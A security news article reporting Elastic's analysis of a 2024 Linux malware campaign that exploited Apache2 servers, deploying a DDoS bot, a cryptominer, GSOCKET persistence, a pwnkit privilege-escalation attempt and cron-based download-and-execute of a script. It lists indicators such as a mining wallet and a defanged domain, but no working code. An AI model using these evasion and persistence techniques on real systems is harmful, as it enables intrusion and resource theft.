Exploiting Apache2 web servers often involves targeting vulnerabilities such as remote code execution (RCE) and path traversal flaws.
Since Apache is used widely, these exploits pose a significant risk to many organizations that fail to implement timely updates and security measures.
Elastic researchers recently identified a new sophisticated Linux malware that was found exploiting Apache2 web servers.
This sophisticated Linux malware campaign was uncovered in March 2024 and found targeting vulnerable servers via “Apache2” web server exploitation.
Linux Malware Exploiting Apache2 Web Servers
The attackers deployed a complex arsenal including “KAIJI” (for DDoS attacks), “RUDEDEVIL” (a cryptocurrency miner), and “custom malware.”
They established persistence using “GSOCKET,” it’s a tool that is used for encrypted communication.
Analyse Any Suspicious Links Using ANY.RUN’s New Safe Browsing Tool: Try for Free
Here to evade the detection, this tool was masqueraded as “kernel processes.” The campaign used the C2 channels, Telegram bots, and cron jobs for remote operations.
A potential Bitcoin/XMR mining scheme involving “gambling APIs” suggested “money laundering” activities.
The attackers employed various Linux-specific techniques. And here below, we have mentioned those techniques:-
- Manipulating “SELinux policies.”
- Using bind mounts for obfuscation.
- Exploiting CVE-2021-4034 (“pwnkit”) for privilege escalation.
They used “pspy64” for system reconnaissance and attempted to deploy custom binaries (‘apache2’ and ‘apache2v86’) with “XOR-encoded” strings, though these faced execution issues.
The malware’s sophistication was evident in its use of multiple persistence mechanisms like “Systemd services,” “SysVinit scripts,” and “bash profile modifications.”
Throughout the campaign, the attackers demonstrated advanced knowledge of Linux systems by continuously adapting their malware and tactics to avoid detection while maximizing system resource exploitation for “cryptocurrency mining” and “DDoS” operations.
Threat actors began their operation with reconnaissance using tools like “whatserver.sh” to gather server information like “FQDNs” from “SSL certificates” and “system details.”
After failing to escalate privileges to root, they established persistence as the “www-data” user, utilizing ‘GSOCKET’ for an “SSL connection” disguised as a “kernel process” named “[mm_percpu_wq]”.
They set up a ‘cron job’ to download and execute a script named “ifindyou” every minute.
This script deployed “XMRIG” connecting to the unmineable[.]com pool to mine Bitcoin for the wallet address “1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz.”
The malware used the infected machine’s hostname as an identifier in the mining process.
Besides this, the attackers also implemented a “Python script” that interacted with an “online gambling game’s demo version.”
This script included functions for “user authentication” (‘obteneruid’), “data transmission” (‘enviardatos’), “simulating betting” (‘hacerjugada’), and “handling bonus rounds” (‘completarbono’).
It used “HTTP POST” and “GET” requests to communicate with a remote server at gcp.pagaelrescate[.]com, as this helps in automating the gambling process while incorporating delays to mimic human behavior.
The script’s use of a demo environment suggests it was likely being used for testing or refining their approach, possibly in preparation for more advanced attacks on live gambling platforms.
Free Webinar on How to Protect Small Businesses Against Advanced Cyberthreats -> Free Webinar